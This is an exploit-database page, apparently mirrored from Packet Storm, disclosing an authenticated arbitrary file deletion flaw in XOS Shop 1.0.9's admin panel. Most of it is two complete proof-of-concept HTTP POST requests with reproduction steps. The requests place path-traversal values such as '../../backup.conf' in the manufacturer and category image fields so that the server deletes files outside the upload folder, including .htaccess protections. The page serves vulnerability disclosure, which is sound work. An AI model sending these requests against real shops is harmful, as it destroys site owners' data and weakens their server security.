Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

XOS Shop 1.0.9 Arbitrary File Deletion

🗓️ 26 Jul 2021 00:00:00Reported by faisalfs10xType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 346 Views

XOS Shop 1.0.9 Arbitrary File Deletion in Admin Panel allows authenticated attacker to delete any file in the web root and circumvent webserver security mechanisms by exploiting the vulnerability

Code
`# Exploit Title: XOS Shop 1.0.9 - 'Multiple' Arbitrary File Deletion (Authenticated)  
# Date: 2021-07-25  
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)  
# Vendor Homepage: https://xos-shop.com  
# Software Link: https://github.com/XOS-Shop/xos_shop_system/releases/tag/v1.0.9  
# Version: 1.0.9  
# Tested on: Windows 10, XAMPP  
# Reference: https://github.com/XOS-Shop/xos_shop_system/issues/1  
  
  
################  
# Description #  
################  
  
# XOS-Shop is a further development of the well-known open source webshop system "osCommerce". The XOS-Shop prior to version 1.0.9 suffers from an arbitrary file deletion vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints.  
  
  
##########  
# PoC 1 #  
##########  
  
Vulnerable URL: http://localhost/xos_shop_v1.0.9/shop/admin/manufacturers.php  
Vulnerable Code: line 66 - xos_shop_v1.0.9\shop\admin\manufacturers.php  
  
Steps to Reproduce:  
  
1. Login as admin  
2. Goto Catalog > Manufacturers > edit any manufacturer  
3. Upload any image as "Manufacturers Image" and click save button  
4. Then, tick "Delete" checkbox and click save button  
5. Intercept the request and replace existing image name to any files on the server via parameter "current_manufacturer_image".  
  
# Assumed there is a backup.conf file in web root  
  
PoC #1) param current_manufacturer_image - Deleting backup.conf file in web root  
  
Request:   
========  
  
POST /xos_shop_v1.0.9/shop/admin/manufacturers.php?page=1&mID=10&action=save HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------120849309142309531191692203678  
Content-Length: 1305  
Origin: http://localhost  
DNT: 1  
Connection: close  
Referer: http://localhost/xos_shop_v1.0.9/shop/admin/manufacturers.php?page=1&mID=10&action=edit  
Cookie: XOSsidAdmin=os13rkgs85m47iak7l8ck2j1ja  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
Sec-GPC: 1  
  
-----------------------------120849309142309531191692203678  
Content-Disposition: form-data; name="manufacturers_name[2]"  
  
App  
-----------------------------120849309142309531191692203678  
Content-Disposition: form-data; name="manufacturers_name[1]"  
  
App  
-----------------------------120849309142309531191692203678  
Content-Disposition: form-data; name="manufacturers_name[3]"  
  
App  
-----------------------------120849309142309531191692203678  
Content-Disposition: form-data; name="manufacturers_url[2]"  
  
app.com  
-----------------------------120849309142309531191692203678  
Content-Disposition: form-data; name="manufacturers_url[1]"  
  
app.com  
-----------------------------120849309142309531191692203678  
Content-Disposition: form-data; name="manufacturers_url[3]"  
  
app.com  
-----------------------------120849309142309531191692203678  
Content-Disposition: form-data; name="delete_manufacturer_image"  
  
true  
-----------------------------120849309142309531191692203678  
Content-Disposition: form-data; name="current_manufacturer_image"  
  
../../backup.conf  
-----------------------------120849309142309531191692203678  
Content-Disposition: form-data; name="manufacturers_image"; filename=""  
Content-Type: application/octet-stream  
  
-----------------------------120849309142309531191692203678--  
  
---  
  
  
##########  
# PoC 2 #  
##########  
  
Vulnerable URL: http://localhost/xos_shop_v1.0.9/shop/admin/categories.php  
Vulnerable Code: line 154-156, 167-169, 421-425, 433-437 - xos_shop_v1.0.9\shop\admin\categories.php  
Note: Multiple parameters affected  
  
Steps to Reproduce:  
  
1. Login as admin  
2. Goto Catalog > Categories/Products > edit any category  
3. Upload any image as "Category Image" if there is no existing image and click save button else,  
4. Tick "Delete" checkbox and click save button  
5. Intercept the request and replace existing image name to any files on the server via parameter "current_category_image".  
  
# Assumed there is a backup.conf file in web root  
  
PoC #2) param current_category_image - Deleting backup.conf file in web root  
  
Request:   
========  
  
POST /xos_shop_v1.0.9/shop/admin/categories.php?action=update_category&cPath=&cpID=1 HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------95672159210084798032704634599  
Content-Length: 2524  
Origin: http://localhost  
DNT: 1  
Connection: close  
Referer: http://localhost/xos_shop_v1.0.9/shop/admin/categories.php?cPath=&cpID=1&action=new_category  
Cookie: XOSsidAdmin=os13rkgs85m47iak7l8ck2j1ja  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
Sec-GPC: 1  
  
-----------------------------95672159210084798032704634599  
Content-Disposition: form-data; name="categories_or_pages_id"  
  
1  
-----------------------------95672159210084798032704634599  
Content-Disposition: form-data; name="current_category_image"  
  
../../../backup.conf  
-----------------------------95672159210084798032704634599  
Content-Disposition: form-data; name="category_name"  
  
Hardware  
-----------------------------95672159210084798032704634599  
Content-Disposition: form-data; name="current_categories_or_pages_status"  
  
1  
-----------------------------95672159210084798032704634599  
Content-Disposition: form-data; name="delete_category_image"  
  
true  
-----------------------------95672159210084798032704634599  
Content-Disposition: form-data; name="categories_image"; filename=""  
Content-Type: application/octet-stream  
  
-----------------------------95672159210084798032704634599  
Content-Disposition: form-data; name="product_list_b"  
  
0  
-----------------------------95672159210084798032704634599  
Content-Disposition: form-data; name="sort_order"  
  
10  
-----------------------------95672159210084798032704634599  
Content-Disposition: form-data; name="categories_or_pages_status"  
  
1  
-----------------------------95672159210084798032704634599  
Content-Disposition: form-data; name="categories_or_pages_name[2]"  
  
Hardware  
-----------------------------95672159210084798032704634599  
Content-Disposition: form-data; name="categories_or_pages_name[1]"  
  
Hardware  
-----------------------------95672159210084798032704634599  
Content-Disposition: form-data; name="categories_or_pages_name[3]"  
  
Hardware  
-----------------------------95672159210084798032704634599  
Content-Disposition: form-data; name="categories_or_pages_heading_title[2]"  
  
-----------------------------95672159210084798032704634599  
Content-Disposition: form-data; name="categories_or_pages_heading_title[1]"  
  
-----------------------------95672159210084798032704634599  
Content-Disposition: form-data; name="categories_or_pages_heading_title[3]"  
  
-----------------------------95672159210084798032704634599  
Content-Disposition: form-data; name="categories_or_pages_content[2]"  
  
-----------------------------95672159210084798032704634599  
Content-Disposition: form-data; name="categories_or_pages_content[1]"  
  
-----------------------------95672159210084798032704634599  
Content-Disposition: form-data; name="categories_or_pages_content[3]"  
  
-----------------------------95672159210084798032704634599--  
  
---  
  
  
# For more explanation, you can refer to the github issue on XOS-Shop via https://github.com/XOS-Shop/xos_shop_system/issues/1  
# The affected version is prior to v1.0.9.  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Jul 2021 00:00Current
0.2Low risk
Vulners AI Score0.2
xos-shoparbitrary file deletionweb rootadmin panelauthenticated attackersecurity mechanisms
346